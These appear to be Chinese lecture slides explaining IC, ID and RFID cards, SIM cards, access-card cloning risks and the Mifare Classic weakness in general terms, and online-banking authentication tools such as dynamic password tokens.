有些ID卡设备、系统厂商,迫于IC卡的强大优势,对外也宣称它的系统可用IC卡,但其实与使用ID卡一样,仅用了IC卡公共区的卡号,并无更改其ID卡的系统结构,更不具有IC卡所拥有的密钥认证、读写的安全机制。 126
127
非接触式IC卡原理 非接触式IC卡简介又称射频卡,成功地解决了无源(卡中无电源)和免接触这一难题,是电子器件领域的一大突破。主要用于公交、轮渡、地铁的自动收费系统,也应用在门禁管理、身份证明和电子钱包。 非接触式IC卡的基本原理是: 射频读写器向IC卡发一组固定频率的电磁波 卡片内有一个IC串联协振电路,其频率与读写器发射的频率相同,这样在电磁波激励下,LC协振电路产生共振,从而使电容内有了电荷; 在这个电荷的另一端,接有一个单向导通的电子泵,将电容内的电荷送到另一个电容内存储,当所积累的电荷达到2V时,此电容可作为电源为其它电路提供工作电压,将卡内数据发射出去或接受读写器的数据。 非接触式IC卡读写器将要发送的信息编码后加载到一固定频率的载波上 接触型IC卡通过ISO7816 国际规范要求的8个接触点,在卡与卡的读写机具之间进行信息交换; 射频即Radio Frequency,通常缩写为RF。表示可以辐射到空间的电磁频率,频率范围从300KHz~30GHz之间。 、IT行业的回答 门禁卡是什么原理 - 门禁卡看上去也就是一张普通的塑料制作的卡片为什么一刷就开,是不是卡片里面附加的什么密码,公司给配了一张门禁卡,有的地方能刷开,有的地方不能刷开,不能刷开的地方只要开通了权限后照样能刷开。这是什么原理啊? 问题补充:要说卡片里面有什么芯片,我否认,因为我曾经把卡弄坏过,还被公司罚了20元,但是卡片被我搞成两半也没发现里面有什么芯片电子线路等,就是一张普通的卡,如果说里面注入了什么号码密码的话那是怎么弄进去的啊? 提问者: tqkkk - 最佳答案 是非接触的吧!如果是的话,那就是非接触IC卡! 简单给你讲一下吧! 现代大学校园里面一般都有的,到一个学校的存钱地方存入金额,然后在食堂超市都可以刷卡消费的. 采用的是射频通信技术。你的那张卡里面有块小的芯片,一周有线圈,这个线圈可以说是天线,其实他是耦合线圈,当你接触读卡器的时候,读卡器,发射高频,通过耦合线圈耦合,卡片的芯片就可以工作了,然后在相当短的时间内通过线圈发射出数据,读卡器接收验证数据,执行符合权限的操作,你这种说白了,就是卡里有个号,然后读卡器有你这个号的权限信息,你刷卡,他验证。 校园里的,在通过卡片验证以后,还要往卡片里面写信息的,因为金额信息是写在卡片里的。这一点和公交IC卡是一个道理。所有的金额信息是在卡片里的!! 这个其实不属于IT行业,是电子行业的,只不过销售的地方有可能和it行业很近。这种门禁方式,安全性还比较高的!但是做为电子高手来说,破解也不是不可能的!虽然数据在传输过程中是加密的! 这种产品的销售,利润在于卡片的销售!而不是读卡器机器本身的利润,好像一张卡片的成本只有几毛钱,销售价格最低3元 卡里的确有芯片,不是认为芯片肯定是像你见过的集成块一样吧!那是经过封装的!如果你把卡片分成两部分,不是断开啊!你就会看到有一个位置有一个小黑点,那就是了,没有经过封装而已,周围会有一圈走线,那就是感应用的天线了。 如果你那是非接触性的肯定有,只是你没有看到而已!现在非接触性IC卡,就发展到这种地步的!不可能没有的!罚你20是远远高于卡片的成本的,但是里面有处罚的性质,有可能你们公司购买在10元以下。 卡的读与写,都是相同道理。射频通信。 射频卡 目录[隐藏] 什么是射频卡? 射频卡原理及应用 射频卡的标准及分类 射频卡(RFID)的发展历程 射频卡与接触式IC卡对比 [编辑本段] 射频卡(简称RF卡)是一种以无线方式传送数据的集成电路卡片,它具有数据处理及安全认证功能等特有的优点。 射频卡及其详细 射频卡又叫非接触式IC卡,诞生于90年代初,是世界上最近几年发展起来的一项新技术,它成功地将射频识技术和IC卡技术结合起来,解决了无源(卡中无电源)和免接触这一难题,是电子器件领域的一大突破。由于存在着磁卡和接触式IC卡不可比拟的优点,使之一经问世,便立即引起广泛的关注, 并以惊人的速度得到推广应用。 非接触式IC卡由IC芯片,感应天线组成,并完全密封在一个标准PVC卡片中, 无外露部分。非接触式IC卡的读写过程,通常由非接触式IC卡与读写器之间通过无线电波来完成读写操作。 非接触型IC卡本身是无源体,当读写器对卡进行读写操作时,读写器发出的信号由两部分叠加组成:一部分是电源信号,该信号由卡接收后,与其本身的L/C产生谐振,产生一个瞬间能量来供给芯片工作。另一部分则是结合数据信号,指挥芯片完成数据、修改、存储等,并返回给读写器。由非接触式IC卡所形成的读写系统,无论是硬件结构, 还是操作过程都得到了很大的简化,同时借助于先进的管理软件,可脱机的操作方式,都使数据读写过程更为简单。 无线智能卡(又称射频卡)是一种无源(免供电)内藏特殊密匙数码的密码卡,它利用双向无线电射频技术,完成卡的数码识别,亦即代表了持卡人的身份和相关信息。这种新科技因具有诸多优点,正在逐步取代光电卡,磁卡,接触IC卡等,是未来智能IC卡发展的主流方向。它广泛应用在身份鉴别、信用鉴别、自动化控制、安全防范等领域,其安全性、保密性,实用性是目前各种通用防范电路无法比拟的。 一、无线智能卡 无线智能卡属于无源加密存储器只读方式,其芯片内除带有64bits的加密串行EPROM外,还带有调制码发生器输出端口,与外围射频电路共同组成无线连接式数据的发送。它的最大特点是无需电池供电,依靠无线电磁波提供系统所需的能源。 无线智能卡的内部结构,其芯片在出厂前已固化特殊密匙数码群中之一组密码信息。在主机识别系统下登录而成为系统的用户卡,该卡将在主机系统设定的规则下,进行身份识别和各种交易。 无线智能卡的芯片体积只有4mm×8mm×1mm,因此,可根据用户需要制成存放在钱包里的名片卡、挂在职员胸前的出入卡、联在匙扣的匙牌卡,甚至可以做成饰物礼品卡、超微型隐藏卡。它与无线读卡模块及主机读写器甚至电脑联网系统配合,可以组建高性能、智能化身份管理识别系统。 二、无线读卡模块 无线智能卡与主机读写识别系统要完成信息交流,必须依赖无线电波作为运输工具,显然无线电发射与接收电路在此系统中占有举足轻重的作用。模块化的无线读卡电路,将不易调试制作的高频收发电路固态化,使得智能卡及其读写识别系统制作大为简化.模块内固化了双向传输数据所需要的无线收/发电路,最后从模块的OUT脚输出串行数据信号。该信号可以送入专用识别控制电路或单片管理机,进行各种各样预设功能的控制。无线读卡模块根据工作电压、幅射范围、输出接口等要求,设计多种型号,附表列出了由中山市达华电子厂生产的部分模块参数,供读者参考。 三、应用举例 无线读卡电路输出一连串数码如何使用,这就需要依靠控制电路或计算机来完成,例如把智能卡用于食堂菜票管理,当计算机读出智能卡的密码后,立即调出该饭卡的内存资料,得知结存金额,键入该次饭票金额,持卡人原存金额记录将被减少。通常,用不同型号的控制IC,可制作出不同功能的控制电路,图3就是应用RF601集成块作小区门控防盗系统。图中,K1为开关,拥有该系统的主人,可通过该开关制备一张“允许”命令卡及一张“开除”命令卡,利用这两张卡,主人可以首次使用“允许”卡命令该机记忆数百张合法卡,并可随时使用“开除”卡,命令开除某张不受欢迎、今后属于非法的卡或者吸纳某张新的合法卡。K2是开锁时间设置,以便配合不同功能的电控锁。 智能卡的应用是极为广泛的,考勤系统、停车场进出收费管理、小区防范系统,甚至在家庭中作为图书管、电源控制、保险框、自动门等。 1. 按供电方式分为有源卡和无源卡。有源是指卡内有电池提供电源,其作用距离较远,但寿命有限、体积较大、成本高,且不适合在恶劣环境下工作;无源卡内无电池,它利用波束供电技术将接收到的射频能量转化为直流电源为卡内电路供电,其作用距离相对有源卡短,但寿命长且对工作环境要求不高。 2. 按载波频率分为低频射频卡、中频射频卡和高频射频卡。低频射频卡主要有125kHz和134.2kHz两种,中频射频卡频率主要为13.56MHz,高频射频卡主要为433MHz、915MHz、2.45GHz、5.8GHz等。低频系统主要用于短距离、低成本的应用中,如多数的门禁控制、校园卡、动物监管、货物跟踪等。中频系统用于门禁控制和需传送大量数据的应用系统;高频系统应用于需要较长的读写距离和高读写速度的场合,其天线波束方向较窄且价格较高,在火车监控、高速公路收费等系统中应用。 3. 按调制方式的不同可分为主动式和被动式。主动式射频卡用自身的射频能量主动地发送数据给读写器;被动式射频卡使用调制散射方式发射数据,它必须利用读写器的载波来调制自己的信号,该类技术适合用在门禁或交通应用中,因为读写器可以确保只激活一定范围之内的射频卡。在有障碍物的情况下,用调制散射方式,读写器的能量必须来去穿过障碍物两次。而主动方式的射频卡发射的信号仅穿过障碍物一次,因此主动方式工作的射频卡主要用于有障碍物的应用中,距离更远(可达30米)。 4. 按作用距离可分为密耦合卡(作用距离小于1厘米)、近耦合卡(作用距离小于15厘米)、疏耦合卡(作用距离约1米)和远距离卡(作用距离从1米到10米,甚至更远)。 5. 按芯片分为只读卡、读写卡和CPU卡。 1994年RFID卡(射频卡)进入中国,引发了中国RFID卡的应用革命,在国内,其应用领域越来越广,涉及各行各业。先后历经了磁卡、TM卡、接触式IC卡、非接触式ID卡、非接触式可读写IC卡。其中为了适应小区、智能大厦的防范系统,门禁系统由单一的门禁功能发展到门禁、考勤、消费、巡更、三表抄送等综合性一卡通系统;为适应远距离感应的要求,国内出现了有源卡、微波卡远距离感应系统。 一、近年国内RFID系统发展新领域 1、特定场所使用: 对于RFID在一些特定场所(需远距离感应或开放式通道管理)的应用(如会议签到系统、工厂大人流量考勤、学生的出入管理,其人员通常具有相当的身份或特殊性,如果采用近距离持卡刷卡进出模式在礼节和可实施性上就完全不可取),原有的有源系统由于其携带、可读写、防冲撞方面的局限达不到实际应用系统的需求。 2、新的应用领域: 2002颁布的国际标准ISO/IEC ,针对RFID技术在物流应用中的问题,提出了统一的标准。对于RFID如何进行物流跟踪、多节点管理、数据安全保护,如何实现物品远距离自动识别,成为广大RFID供应商急需思考和解决的问题。 3、智能身份证的发展: 随着个别发达城市二代身份证的使用,拉开了智能身份证应用的序幕,智能身份证实施需要实现多线程操作、管理和数据安全保护。 4、新行业迅速崛起: 零售业百强进入中国,中国零售连锁已经形成,针对零售行业RFID的应用,如何降低损耗,真正变超市购物为“取物”,为广大RFID供应商提出了新的考验;连锁企业的形成,网络化接口、异地化管理、数据共享,为传统单机版RFID系统提出了新的考验和需求。 5、高安全概念的引入: 对于物品快速跟踪及大人流量的开放式管理,对标签的正确识别率及标签数据的安全性提出严格的要求。 6、安全事故迅猛提高: 假冒商品的迅速崛起和疫情快速漫延随着经济的发展,部分行业安全事故增长、假冒商品的迅速崛起和疫情传染快速蔓延,能否对此进行有效防范对RFID系统提出了严峻考验。 二、近年国内RFID系统发展主流方向 ◆ 全国性一卡通系统的提出; ◆ 远距离和近距离系统的完美组合; ◆ 防冲撞多标签识别的提出; ◆ 标签大容量及可读写; ◆ 标签的多节点管理及数据安加密安全保护; 三、全新的RFID升级换代产品呼之欲出 针对国内RFID系统的市场需求和发展主流方向,符合需求的ISO15693国际标准出台,使得符合ISO15693国际标准的全新的开放式RFID管理概念迅速在市场上被推崇,它被称为现有ID卡门禁系统的升级换代产品。 1、与通常的ID卡技术比较,具有更高的安全性能 ◆ 标签具有出厂设置的除了唯一的UID之外,还具有客户UID二次发行功能;用户可以采用其特殊的软件加密方式进行用户UID二次发卡,可以避免同类型阅读器产品对标签UID号码的读取。不同于现在普遍采用的ID卡技术。 ◆ 由于可以进行用户软件加密的二次UID发卡功能,极大地降低了持卡人个人隐私被侵犯的可能性。 2、采用ISO15693标准,实现无源远距离检测和多标签同时检测 ◆ 该ISO15693标准具有电子标签防冲撞读写功能,每秒可读写标签达到50张,实现了多物品和多出入人员的检测。 ◆ 采用远距离阅读器,对ISO15693协议标准的电子标签的阅读距离可以达到120CM的特性,从而可以实现通道式快速检测,也可以广泛应用于会议管理、考勤管理、物流管理、隐蔽式人员和物质追踪管理等方面。 3、实现对“人”和对“物”的双重安全管理与信息管理 ◆ 通常的门禁系统和保安系统只能实现对人员的出入进行管理,无法实现对出入人员随身携带的贵重物品、文件资料、仪器设备等进行有效识别和管理。 ◆ 如果在需要保护和管制的物品上附加电子标签,在出入口处增加感应器,就可以实现对物品的追踪管理。 ◆ 如果能将物品追踪的电子标签与门禁管理系统的出入身份卡片结合起来,采用同一标准的电子标签和感应检测系统,则可以实现同一门禁系统既"管人"又"管物"的全新的安全防范概念和应用需求。 ◆ 人员出入管理与贵重物品追踪管理为管理信息化提供自动化的数据采集,是信息化管理的重要工作。 4、将常规的门禁管理与RFID开放式安全管理结合,形成综合的RFID管理系统的应用 5、“一卡通”应用 ◆ 电子标签具有1K~16K的多扇区数据存储空间,可采用软加密方式对各扇区数据进行管理,适合“一卡通”应用。 ◆ 将贵重物品的管理融入进了“一卡通”系统,实现了真正意义上的“一卡通”应用,提高了系统资产投资回报率。 四、RFID换代产品的广泛应用 结合ISO15693国际统一标准,RFID系统将广泛应用到各行各业及家庭生活,为企业的效益、员工的工作及家庭带来相当大的便利。尤其是智能身份证的开启将直接推动RFID电子标签应用的新篇章。其主要应用有: ◆ 开放式会议签到、通道管理、企业/工厂快速人流考勤; ◆ 基于物品的防盗、防伪、生产/销售跟踪管理、库存管理、快速托运及物品快速分配; ◆ 基于智能身份证的多种应用(身份防伪识别、电子钱包、工作档案、网上搜索和其它一卡通应用系统); ◆ 基于人生安全的快速渗透:有效防范安全事故、假冒商品、疫情传播对人体的伤害; ★ 全国各级城市正在实施的菜篮子工程,实现无污染绿色食品的智能识别和管理; ★ 针对全国煤气管理混乱,黑气严重造成人民生命安全,实现煤气瓶的有效发放、检验管理; ★ 重型工业/化工业的设备使用情况和寿命进行有效跟踪,避免因设备老化使用造成人民的生命安全; ★ 实现对传染性疫情的快速蔓延和控制。 五、结束语 纵观RFID系列产品的发展历程,我们不难发现,随着市场需求的不断发展,人们对安全防范认识水平的日益提升,新的RFID升级换代产品必然会逐渐进入我们的生活,并切实的让我们感受到现代科技带给我们的高安全与高效率,而RFID技术及产品的不断发展也必将引发其应用领域的新的高潮,与此同时也必将带来RFID技术发展新的变革。 1.可靠性高:非接触式IC卡与读写器之间无机械接触,避免了由于接触读写而产生的各种故障。例如:由于粗暴插卡、非卡外物插入、灰尘或油污导致接触不良等原因造成的故障。此外,非接触式卡表面无裸露的芯片,无须担心芯片脱落、静电击穿、弯曲损坏等问题,既便于卡片的印刷,又提高了卡片的使用可靠性。 2.操作方便,快速:由于非接触通讯,读写器在10cm范围内就可以对卡片操作,所以不必 插拨卡,非常方便用户使用。非接触式卡使用时没有方向性,卡片可以任意方向掠过读写器,即可完成操作,这大大提高了每次使用的速度。 3.防冲突:非接触式卡中有快速防冲突机制,能防止卡片之间出现数据干扰,因此,读写器可 以“同时”处理多张非接触式IC卡。这提高了应用的并行性,无形中提高了系统工作速度。 4.可以适合于多种应用:非接触式卡的存储结构特点使它一卡多用,能应用于不同的系统,用户可根据不同 的应用设定不同的密码和访问条件。 5.加密性能好:非接触式卡的序列号是唯一的,制造厂家在产品出厂前已将此序列号固化,不可再更改。非接触式卡与读写器之间采用双向验证机制,即读写器验证IC卡的合法性,时IC卡也验证读写器的合法性。非接触式卡在处理前要与读写器进行三次相互认证,而且在通讯过程中所有的数据都加密。此外,卡中各个扇区都有自己的操作密码和访问条件?因为ID卡具有以上无可比拟的优点,所以它很适宜应用于电子钱包,公路自动收费系统和公共汽车自动售票系统等。 127
128
IC卡--按照是否带有微处理器区分 按照是否带有微处理器,比卡可分为存储卡和智能卡两种。
智能卡也称为CPU(中央处理器)卡,它具有数据读写和处理功能,因而具有安全性高、可以离线操作等突出优点。所谓离线操作是与联机操作相对而言的,它可以在不连网的终端设备上使用。离线操作不仅大大减少了通信时间,也能够在移动收费点 (如公共交通)或通信不顺畅的场所使用。银行的IC卡通常是指智能卡。 CPU卡芯片通俗地讲就是指芯片内含有一个微处理器,它的功能相当于一台微型计算机。人们经常使用的集成电路卡(IC卡)上的金属片就是CPU卡芯片。 可分为非接触 式CPU卡、接触式CPU卡 门禁卡被复制居民担忧 IC卡并无此类隐忧 2009/7/20/08:19 来源:慧聪安防网 作者:王娟 【慧聪安防网】目前,很多小区都安装了门禁系统,实现居民刷卡进楼的同时有效地杜绝了推销人员,同时也降低了发生治安事件的可能性。这些门禁卡大多数都是由物业核发,但由于技术门槛较低,不少配锁小店也做起了复制门禁卡的生意。只需在电脑上连接一个读卡器,将门禁卡放到读卡器上后,将门禁卡上的那串数字复制下来再复制到空白卡上,一张新的门禁卡就复制成功了。据了解,复制一张卡只需要3分钟时间。 小区门口的“复制门禁卡”的广告 点击此处查看全部新闻图片 在Google上搜索“门禁卡复制器”共得到107,000个结果。复制器根据功能多少价格各异,最低的480元/台。在与一些卖家联系后,了解到这些门禁卡复制器并不是所有的门禁卡都能复制。一个生产销售门禁卡的公司的工作人员也表达了同样的说法:“可以复制的是‘只读’型的ID卡,虽然小区门禁系统为门禁卡内的数据建立了数据库,但卡内数据却能通过复制器被复制到空白卡上。”除了门禁卡外,还可以复制停车月卡、电门卡等ID卡、HID卡等。 ID卡即为THRC12/13只读式非接触卡,它靠读卡器感应供电并读出存储在芯片EEPROM中的唯一卡号,卡号在封卡前一次写入,封卡后不能更改。无源和免接触是该芯片两个最突出的特点,射频接口电路是关键的核心技术,它从读卡器接收射频能量,为芯片产生电源和时钟,并采用相移键控和加载调幅等技术实现卡与读卡器间的无线通讯。非接触式ID卡无需插拔卡,避免了由于机械接触不良导致的各种故障,因而具有操作方便、快捷、可靠、寿命长等突出优点,特别适用于人流量大的场合。典型应用:食堂售饭系统、巡更系统、考勤系统、门禁系统、企业一卡通系统等射频识别领域。 IC卡有没有可能被复制呢?“IC卡复制不了,不过现在门禁系统大都是ID卡,成本比IC卡低嘛。”IC卡全称集成电路卡(IntegratedCircuitCard),又称智能卡(SmartCard).可读写,容量大,有加密功能,数据记录可靠,使用更方便,如一卡通系统,消费系统等,目前主要有PHILIPS的Mifare系列卡。 IC卡与ID卡相比,IC卡的安全性远大于ID卡。ID卡内的卡号只读取,无任何权限,易于仿制;IC卡内所记录数据的读取,写入均需相应的密码认证,甚至卡片内每个区均有不同的密码保护,全面保护数据安全。因此,门禁卡复制器并不能复制IC卡。 虽然如此,ID卡被复制也需要引起重视。“那么容易就复制一张门禁卡,那门禁系统还管什么用?”听到记者介绍时,南二环附近某小区居民有些担忧。另外,物业公司也表示,“如果门禁卡确实能复制,将给物业公司的安全管理带来很大的不便。” SIM卡 目录[隐藏] 【SIM卡相关介绍】 【SIM卡基本概念】 【SIM卡注意事项】 【SIM卡常见故障】 【中国移动推出4G SIM卡】 【SIM卡四大功能】 【SIM卡触点电性能】 【SIM卡的内部结构】 【SIM卡的软件特性】 [编辑本段] SIM卡是(Subscriber Identity Module 客户识别模块)的缩写,也称为智能卡、用户身份识别卡,GSM数字移动电话机必须装上此卡方能使用。它在一电脑芯片上存储了数字移动电话客户的信息,加密的密钥等内容,可供GSM网络客户身份进行鉴别,并对客户通话时的语音信息进行加密。SIM卡的使用,完全防止了并机和通话被窃听行为,并且SIM卡的制作是严格按照GSM国际标准和规范来完成的,从而可靠的保障了客户的正常通信。您刚入网时得到的SIM卡是一张大卡,小卡是嵌在大卡上的,目前手机普遍使用小卡,您可以把小卡从大卡上取下使用。SIM 卡有大小之分,大卡的尺寸为 54mm×85mm (信用卡标准尺寸),小卡的尺寸为 25mm×15mm (比普通邮票还小)。其实 小卡就是大卡上带有芯片的那一块 , “ 大卡 ” 上面真正起作用的就是它上面的那张 “ 小卡 ” , “ 小卡 ” 可以从大卡中取下。目前国内流行样式是 “ 小卡 ” ,小卡也可以换成 “ 大卡 ” (有个卡托即可)。 “ 大卡 ” 和 “ 小卡 ” 分别适用于不同类型的 GSM 移动电话,早期的机型如摩托罗拉 GC87C 、 308C 等手机用的是 “ 大卡 ” ,现在新出的机型基本上都是用 “ 小卡 ” 。 SIM卡在GSM系统中的应用,使卡和手机分离,SIM卡唯一标识一个客户。一张SIM卡可以插入任何一部GSM手机中使用,而使用手机所产生的通信费则自己记录在该SIM卡所唯一标识的客户帐上。SIM卡容量有8K、16K、32K、64K,其中16K以上的大容量的SIM卡统称为多功能STK卡。 为防止他人擅用您的 SIM卡, SIM卡设置了个人识别密码PIN码,只要设置了PIN码用户在每次打开手机时,屏幕上会显示要求输入4位PIN码,初始的PIN码为1234或0000,连续输入三次错误码的PIN码,手机会显示“输入PUK码”或“已锁”字样,说明SIM卡已被锁上,这时千万不要再按手机键盘,因为如果输入的PIN解锁码累计超过10次,SIM卡将自动报废,此时需携带SIM卡身份证到移动营业厅,由服务人员为您解锁。 PIN2:个人识别码2,允许用户使用需要SIM卡支持的某些特殊功能,如设置通话计费,密码等等,需网络支持,目前用户无需使用PIN2码。 目前,中国发行SIM卡的有中国电信.中国联通.中国移动 三家。 中国电信的SIM卡是由中国电信全权推出的“中国电信”字样及其徽记。中国联通的SIM卡图案全国统一,正面是风景名胜等,反面一般是统一的注意事项、“中国联通”字样及其徽记。中国移动的SIM卡是由各地自行设计发行的,SIM卡正面图案一般统一印有地球、“中国移动”字样及其徽记,反面则是各地主管部门的名称和当地风景名胜、名人、生肖、广告等。SIM卡采用A级加密方法制作,存储着用户数据、鉴权方法及密匙,可供GSM系统对用户身份进行鉴别。同时,用户通过它完成与系统的连接和信息的交换。 1.SIM卡的存储容量 一般SIM卡的IC芯片中,有8kB的存储容量,可供储存以下信息: (1) 100组电话号码及其对应的姓名文字。 (2) 15组短信息(Short Message)。 (3) 5组以上最近拨出的号码。 (4) 4位SIM卡密码(PIN)。 2.SIM卡卡号的含义 SIM卡上有20位数码。前面6位(898600)是中国的代号;第7位是业务接入号,在135、136、137、138、139中分别为5、6、7、8、9;第8位是SIM卡的功能位,一般为0,现在的预付费SIM卡为1;第9、10位是各省的编码;第11、12位是年号;第13位是供应商代码;第14~19位则是用户识别码;第20位是校验位。 3.SIM卡的密码 PIN码是指SIM卡的密码,存在于SIM卡中,其出厂值为1234或0000。激活PIN码后,每次开机要输入PIN码才能登录网络。PUK码是用来解PIN码的万能钥匙,共8位。用户是不知道PUK码的,只有到营业厅由工作人员操作。当PIN码输错3次后,SIM卡会自动上锁,此时只有通过输入PUK才能解锁。PUK码共有10次输入机会。所以此时,用户千万不要自行去碰PUK密码,输错10次后,SIM卡会自动启动自毁程序,使SIM卡失效。此时,只有重新到营业厅换卡。其实,只要小心使用,PIN密码只会保护你的安全。 SIM卡有两个PIN码:PIN1码和PIN2码。我们通常讲的PIN码就是指PIN1码,它用来保护SIM卡的安全,是属于SIM卡的密码。PIN2码也是SIM卡的密码,但它跟网络的计费(如储值卡的扣费等)和SIM卡内部资料的修改有关。所以PIN2码是保密的,普通用户无法用上PIN2码。不过,即使PIN2码锁住,也不会影响正常通话。也就是说,PIN1码才是属于手机用户的密码。 在设置固定号码拨号和通话费率(需要网络支持)时需要PIN2码。每张SIM卡的初始PIN2码都是不一样的。如果三次错误地输入PIN2码,PIN2码会被锁定。这时同样需要到营业厅去解锁。如果在不知道密码的情况下自己解锁,PIN2码也会永久锁定。PIN2码被永久锁定后,SIM卡可以正常拨号,但与PIN2码有关的功能再也无法使用。以上各种码的默认状态都是不激活。 4.SIM卡的原理 SIM卡是带有微处理器的芯片, 内有5个模块,每个模块对应一个功能: CPU(8位)、程序存储器ROM(6-16kbit)、工作存储器RAM( kbit)、数据存储器EEPROM(2-8kbit)和串行通信单元,这5个模块集成在一块集成电路中。SIM卡在与手机连接时,最少需要5个连接线: *电源(Vcc) *时钟(CLK) *数据I/Q口(Data) *复位(RST) *接地端(GND) 128
129
IC卡安全隐患 2009年,工业和信息部发布了《关于做好应对部分IC卡出现严重安全漏洞工作的通知》;
背景:2008年,德国研究员亨里克·普洛茨和美国弗吉尼亚大学计算机科学在读博士卡尔斯滕·诺尔就享受到了成功的喜悦:他们最先利用电脑成功破解了Mifare经典芯片(简称MI芯片,Mifare非接触逻辑加密卡 )的安全算法; 一旦不法分子攻破这一技术,“就可以随意修改自己卡内的信息,比如原来充值10元,他就可以随意改成1000元或者10000元,甚至更多。而且一旦复制了别人的卡片,也可以随意修改信息。这对广大持卡人来说,无疑是极大的安全隐患。” CPU卡比较安全 非接触逻辑加密卡被解密就意味着M1卡可以被复制,使用在线系统尽可以避免被非法充值,但是不能保证非法消费,即复制一张一样ID号的M1卡,就可以进行非法消费。现在的技术使用FPGA就可以完全复制。基于这个原理,M1的门禁卡也是不安全的。目前国内80%的门禁产品均是采用原始IC卡的ID号或ID卡的ID号去做门禁卡,根本没有去进行加密认证或开发专用的密钥,其安全隐患远远比Mifare卡的破解更危险,非法破解的人士只需采用的是专业的技术手段就可以完成破解过程,导致目前国内大多数门禁产品都不具备安全性原因之一,是因为早期门禁产品的设计理论是从国外引进过来的,国内大部分厂家长期以来延用国外做法,采用ID和IC卡的只读特性进行身份识别使用,很少关注卡与机具间的加密认证,缺少钥匙体系的设计;而ID卡是很容易可复制的载体,导致所有的门禁很容易几乎可以在瞬间被破解复制;这才是我们国内安防市场最大的灾难。 129
130
网上银行个人认证介质(安全工具) 目前常用的认证介质 1、密码 2、文件数字证书 3、动态口令卡 4、动态手机口令 5、移动口令牌
1、密码 2、文件数字证书 3、动态口令卡 4、动态手机口令 5、移动口令牌 6、移动数字证书
131
目前常用的网银认证介质1-密码 1、密码 密码是每一个网上银行必备有认证介质,记得要使用安全好记的密码就是。但是密码非常容易被木马盗取或被他人偷窥。
132
目前常用的网银认证介质2-文件数字证书 2、文件数字证书
文件数字证书是存放在电脑中的数字证书,每次交易时都需用到,如果你的电脑没有安装数字证书是无法完成付款的;已安装文件数字证书的用户只需输密码即可。 未安装文件数字证书的用户安装证书需要验证大量的信息,相对比较安全。 但是文件数字证书不可移动,对经常换电脑使用的用户来说不方便(支付宝等虚拟的验证手机,而网上银行一般要去银行办理);而且文件数字证书有可能被盗取(虽然不易,但是能),所以不是绝对安全的。
133
目前常用的网银认证介质3-动态口令卡 动态口令卡是一种类似游戏的密保卡样子的卡。
卡面上有一个表格,表格内有几十个数字。当进行网上交易时,银行会随机询问你某行某列的数字,如果能正确地输入对应格内的数字便可以成功交易;反之不能。 动态口令卡可以随身携带,轻便,不需驱动,使用方便,但是如果木马长期在你的电脑中,可以渐渐地获取你的口令卡上的很多数字,当获知的数字达到一定数量时,你的资金便不再安全,而且如果在外使用,也容易被人拍照。
134
目前常用的网银认证介质4-动态手机口令 当你尝试进行网上交易时,银行会向你的手机发送短信,如果你能正确地输入收到的短信则可以成功付款,反之不能。 不需安装驱动,只需随身带手机即可,不怕偷窥,不怕木马。相对安全。 但是必须随身带手机,手机不能停机(手机停机,无法付款;无法汇款,就会一直停机。就像给证明就给开箱,不开箱没有证件就无法证明一样了),不能没电,不能丢失。而且有时通信运营商服务质量低导致短信迟迟没到,影响效率。
135
目前常用的网银认证介质5-移动口令牌 类似梦幻西游的将军令,一定时间换一次号码。付款时只需按移动口令牌上的键,这时就会出现当前的代码。一分钟内在网上银行付款时可以用凭这个编码付款。如果无法获得该编码,则无法成功付款。 不需要驱动,不需要安装,只要随身带就行,不怕偷窥,不怕木马。口令牌的编码一旦使用过就立即失效,不用担心付款时输入的编码被他们看到他们在一分钟内再付款。 中国银行动态口令牌(E-TOKEN)的原理是什么?(续) 什么是动态口令牌? 答:动态口令牌有硬件令牌和手机令牌两种,其中中国银行的是硬件口令牌,它是一种内置电源、密码生成芯片和显示屏、根据专门的算法每隔一定时间自动更新动态口令的专用硬件。 作为一种重要的双因素认证工具,动态口令牌被广泛地运用于安全认证领域,动态口令牌可以大大提升网上银行的登录和交易安全。 关于动态口令技术应用场景,可以参考《动态口令应用场景》 动态口令牌有哪些优点? 答:动态口令牌的优点集中体现在不仅非常安全,而且使用非常方便。动态口令又称一次性密码,每60秒随机更新一次,其优点在于一个口令在认证过程中只使用一次,下次认证时则更换使用另一个口令,使得不法分子难以仿冒合法用户的身份,用户也不需要去记忆密码。动态口令牌的使用十分简单,无需安装驱动,用户只要根据网上银行系统的提示,输入动态口令牌当前显示的动态口令即可。 动态口令的更新频率是多少,密码有多少位? 答:动态口令每60秒随机更新一次,长度为6位。 动态口令牌的有效期有多长? 答:动态口令牌的有效使用时间为出厂后三年。超过有效使用时间后,动态口令牌将自动失效。 动态口令牌被锁住了,该如何处理? 答:使用动态口令进行登录或交易验证时,如果动态口令连续输错几次,系统将自动锁定该动态口令牌,您需要携带本人有效身份证件和一张关联了新版网上银行的银行卡或存折到柜台办理解锁。 这个是现在最安全的网银方式之一,欧洲很多银行网银都是这么做的。 关于中行动态口令牌原理 E-TOKEN该装置拥有内置芯片和一个可以显示多达6位数字 的LCD窗口,但其体积很小,可以系在钥匙环上。在柜台发售这种装置时,与网银用户绑定建立一对一对应关系,使用唯一的128位种子将其初始化;其内部芯片每分钟都会使用一种算法,组合该种子与当前时间,生成一个随机的数字。而在网银认证服务器则采取和这个动态口令牌同一种算法产生该随机数字,保 证动态密码器和网银服务器的单一认证,就像每个客户都有了世界上独一无二的身份认证,保证客户使用网银的安全性。 动态口令牌其实无非就是认证服务器端和这个“动态口令牌”都使用同样的一套算法,可以自定义计算数组的时间间隔,每批次“动态口令牌”都拥有唯一的序列号,然后服务器端和“动态口令牌”执行相同的计算程序,在设定好的相同的更新时间计算出新的数组。 事实上,服务器跟跟E-Token的动态口令牌没有直接联系,就是根据唯一的序列号,利用公式,各自计算,保证算出的数字都是一样且在同一时间更新。 中行动态口令牌时间校准 对于失去时间同步的动态口令牌,目前可以通过时间校准功能来进行远程同步,确保其能够继续使用,降低对应用的影响,但对于超出默认的时间同步令牌,将无法继续使用或进行远程同步,必须返厂或送回服务器端另行处理。 中行动态口令牌用户体验 动态口令牌方式不用手机短信,不用插拔U-KEY,大大简单了操作流程但也保证了安全性。 就这个E-Token动态口令牌,在方便了使用网上银行的同时也让提升中行印象。 动态口令牌 + 数字证书 CA数字证书应该与动态口令牌结合起来,大额交易无阻。 手机令牌 手机令牌是用来生成动态口令的手机客户端软件,在生成动态口令的过程中,不会产生任何通信及费用,不存在通信信道中被截取的可能性,手机作为动态口令生成的载体,欠费和无信号对其不产生任何影响,由于其在具有高安全性、0成本、无需携带、获取以及无物流等优势,相比硬件令牌其更符合互联网的精神,由于以上优势,手机令牌可能会成为3G时代动态密码身份认证令牌的主流形式。 [编辑本段] 